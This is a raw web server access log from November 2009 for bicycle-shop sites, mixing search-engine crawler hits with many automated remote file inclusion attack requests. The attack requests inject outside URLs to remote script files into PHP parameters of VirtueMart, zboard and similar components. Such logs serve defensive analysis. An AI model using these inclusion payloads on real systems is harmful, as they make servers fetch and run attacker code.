213.186.126.89 - - [11/Nov/2009:03:02:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:02 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:03:02:02 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
119.63.193.75 - - [11/Nov/2009:03:14:50 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.193.75 - - [11/Nov/2009:03:16:56 -0800] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
220.181.94.230 - - [11/Nov/2009:03:46:42 -0800] "GET /bullitinboard/viewtopic.php?p=14857 HTTP/1.1" 200 533 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "bicyclestoreshouston.com"
69.175.14.34 - - [11/Nov/2009:03:52:59 -0800] "GET /zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.14.34 - - [11/Nov/2009:03:52:59 -0800] "GET /logs//zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.14.34 - - [11/Nov/2009:03:52:59 -0800] "GET /logs/access.log%20%20//zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.14.34 - - [11/Nov/2009:03:53:01 -0800] "GET /logs//zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.14.34 - - [11/Nov/2009:03:53:01 -0800] "GET /logs/access.log%20%20//zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:03:59:04 -0800] "GET /tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:03:59:04 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.14.34 - - [11/Nov/2009:03:59:38 -0800] "GET /logs/access.log//zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.175.14.34 - - [11/Nov/2009:03:59:50 -0800] "GET /logs/access.log//zboard//skin/zero_vote/setup.php?dir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:04:01:27 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:04:01:27 -0800] "GET /translations//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:04:03:17 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:04:03:18 -0800] "GET /tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:04:03:20 -0800] "GET /logs//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.188.90.49 - - [11/Nov/2009:04:05:47 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.nationsford.org/cache/idx? HTTP/1.1" 200 1766 "-" "libwww-perl/5.831" "houstonbikeshop.com"
209.188.90.49 - - [11/Nov/2009:04:07:21 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://www.nationsford.org/cache/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
209.188.90.49 - - [11/Nov/2009:04:07:22 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.nationsford.org/cache/idx? HTTP/1.1" 200 1766 "-" "libwww-perl/5.831" "houstonbikeshop.com"
209.188.90.49 - - [11/Nov/2009:04:07:22 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.nationsford.org/cache/idx? HTTP/1.1" 200 2376 "-" "libwww-perl/5.831" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:04:07:58 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.103.31.24 - - [11/Nov/2009:04:08:01 -0800] "GET /translations//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:04:08:55 -0800] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:10:20 -0800] "GET /logs/access.log/////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:10:20 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:10:20 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:10:25 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:04:10:28 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:04:10:28 -0800] "GET /logs//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
157.100.230.82 - - [11/Nov/2009:04:10:28 -0800] "GET /tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:10:29 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:10:29 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:12:39 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1766 "-" "Mozilla/5.0" "houstonbikeshop.com"
128.121.21.48 - - [11/Nov/2009:04:12:39 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 2376 "-" "Mozilla/5.0" "houstonbikeshop.com"
85.214.74.222 - - [11/Nov/2009:04:18:51 -0800] "GET /logs/access.log//tools/send_reminders.php?includedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.101.246.181 - - [11/Nov/2009:04:36:07 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:16 -0800] "GET /apple-touch-icon.png HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:23 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:45 -0800] "GET /iphone/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:47 -0800] "GET /mobile/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:49 -0800] "GET /m/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:53 -0800] "GET /iphone/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:56 -0800] "GET /m/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:57 -0800] "GET /mobi/ HTTP/1.0" 404 - "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.svbikes.com"
75.101.246.181 - - [11/Nov/2009:04:36:58 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "svbikes.com"
213.79.101.98 - - [11/Nov/2009:04:42:19 -0800] "GET /logs/access.log//?_zb_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:51:12 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:51:13 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:51:13 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:51:16 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:51:16 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:51:17 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [11/Nov/2009:04:51:21 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [11/Nov/2009:04:51:21 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.247.200.12 - - [11/Nov/2009:04:51:21 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:04:52:08 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:04:52:42 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:04:52:42 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:04:52:42 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:52 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:52 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:52 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:55 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:55 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:55 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:52:56 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:04:53:07 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:04:53:07 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
72.232.167.73 - - [11/Nov/2009:04:53:07 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [11/Nov/2009:04:55:02 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [11/Nov/2009:04:55:02 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [11/Nov/2009:04:55:03 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:04:56:21 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:04:56:21 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:04:56:21 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:03 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:03 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:22 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:22 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:22 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:28 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
78.110.50.121 - - [11/Nov/2009:04:57:29 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.172.162.163 - - [11/Nov/2009:04:57:59 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [11/Nov/2009:04:58:07 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [11/Nov/2009:04:58:07 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.80.108.81 - - [11/Nov/2009:04:58:08 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [11/Nov/2009:05:01:00 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [11/Nov/2009:05:01:01 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
62.141.47.10 - - [11/Nov/2009:05:01:01 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.krieke.nl//Beta/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.4.40 - - [11/Nov/2009:05:01:05 -0800] "GET /appserv/main.php?appserv_root=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.4.40 - - [11/Nov/2009:05:01:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.4.40 - - [11/Nov/2009:05:01:05 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.4.40 - - [11/Nov/2009:05:01:16 -0800] "GET /appserv/main.php?appserv_root=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.4.40 - - [11/Nov/2009:05:01:16 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.36.4.40 - - [11/Nov/2009:05:01:16 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:08:13 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:08:13 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:08:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:08:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:10:33 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:10:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:10:34 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:10:59 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:11:00 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
213.186.126.89 - - [11/Nov/2009:05:11:00 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
70.38.31.183 - - [11/Nov/2009:05:21:10 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://come.kr/bbs/data2/images/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
70.38.31.183 - - [11/Nov/2009:05:21:10 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://come.kr/bbs/data2/images/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
